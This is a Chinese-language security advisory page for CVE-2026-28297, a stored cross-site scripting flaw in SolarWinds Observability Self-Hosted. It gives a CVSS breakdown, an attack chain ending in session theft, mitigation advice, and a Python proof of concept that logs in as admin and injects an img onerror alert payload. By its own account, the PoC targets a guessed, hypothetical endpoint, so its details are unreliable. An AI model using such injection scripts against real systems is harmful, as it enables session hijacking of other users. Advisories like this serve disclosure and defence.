CVE-2026-28297 CVSS 6.1 中危

CVE-2026-28297 SolarWinds Observability 存储型XSS漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-28297

漏洞类型

存储型跨站脚本

CVSS评分

6.1 中危

攻击向量

邻接 (AV:A)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

SolarWinds Observability Self-Hosted

漏洞概述

SolarWinds Observability Self-Hosted被发现存在存储型跨站脚本漏洞。由于系统未能有效过滤用户输入，具备高权限的攻击者可通过邻接网络注入恶意脚本。该脚本被持久化存储后，当其他用户浏览相关页面时将自动执行，从而造成数据泄露和完整性破坏。

技术细节

该漏洞属于存储型跨站脚本（Stored XSS），其核心在于应用程序对用户输入的过滤机制缺失。根据CVSS向量分析，攻击者需拥有高权限（PR:H），且攻击源位于邻接网络（AV:A）。攻击者将恶意JavaScript代码注入到系统某个可持久化存储的字段中。该代码被写入数据库，当其他用户访问渲染该数据的页面时，载荷在浏览器端解析执行。由于无需用户交互（UI:N），攻击隐蔽性较强。成功利用后，攻击者可窃取敏感Cookie或会话令牌，甚至篡改页面内容，对系统的机密性（C:H）和完整性（I:H）造成严重影响。

攻击链分析

STEP 1

侦察

攻击者识别目标为SolarWinds Observability Self-Hosted系统，并获取一个高权限账户（满足PR:H要求）。

STEP 2

漏洞利用

攻击者通过邻接网络（AV:A）访问系统，在特定的输入字段（如配置描述或用户资料）中注入恶意的JavaScript代码段。

STEP 3

存储

应用程序将未经充分过滤的恶意数据存储在后端数据库中，形成持久化威胁。

STEP 4

触发

当具有查看权限的其他用户（如管理员）访问包含该恶意数据的页面时，浏览器解析并执行其中的脚本。

STEP 5

影响

恶意脚本在受害者浏览器上下文中运行，窃取Session ID或敏感数据（C:H），或执行未授权操作（I:H）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# This is a generic PoC simulation for Stored XSS
# Target URL (Hypothetical endpoint based on vulnerability type)
target_url = "https://target-solarwinds/api/endpoint"
login_url = "https://target-solarwinds/api/login"

# Malicious payload to demonstrate script execution
# Use a simple alert or callback for verification
xss_payload = "<img src=x onerror=alert('CVE-2026-28297-Test')>"

# Authenticate with High Privilege Account (PR:H required)
session = requests.Session()
credentials = {"username": "admin", "password": "high_priv_pass"}
session.post(login_url, data=credentials)

# Inject the payload via a vulnerable input field
headers = {"Content-Type": "application/json"}
data = {
    "configuration_name": "Test Config",
    "description": xss_payload  # Injecting payload into a persistent field
}

response = session.post(target_url, json=data, headers=headers)

if response.status_code == 200:
    print("Payload injected successfully.")
    print("Trigger: Navigate to the page that displays the 'description' field.")
else:
    print(f"Injection failed with status code: {response.status_code}")

影响范围

SolarWinds Observability Self-Hosted (具体版本请参考官方2026-1-1发布说明及之前版本)

防御指南

临时缓解措施

在未安装补丁前，应严格限制高权限账户的使用，并尽可能隔离系统管理界面的网络访问。建议部署Web应用防火墙（WAF）以拦截常见的XSS攻击模式，并对关键数据页面进行人工审计。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表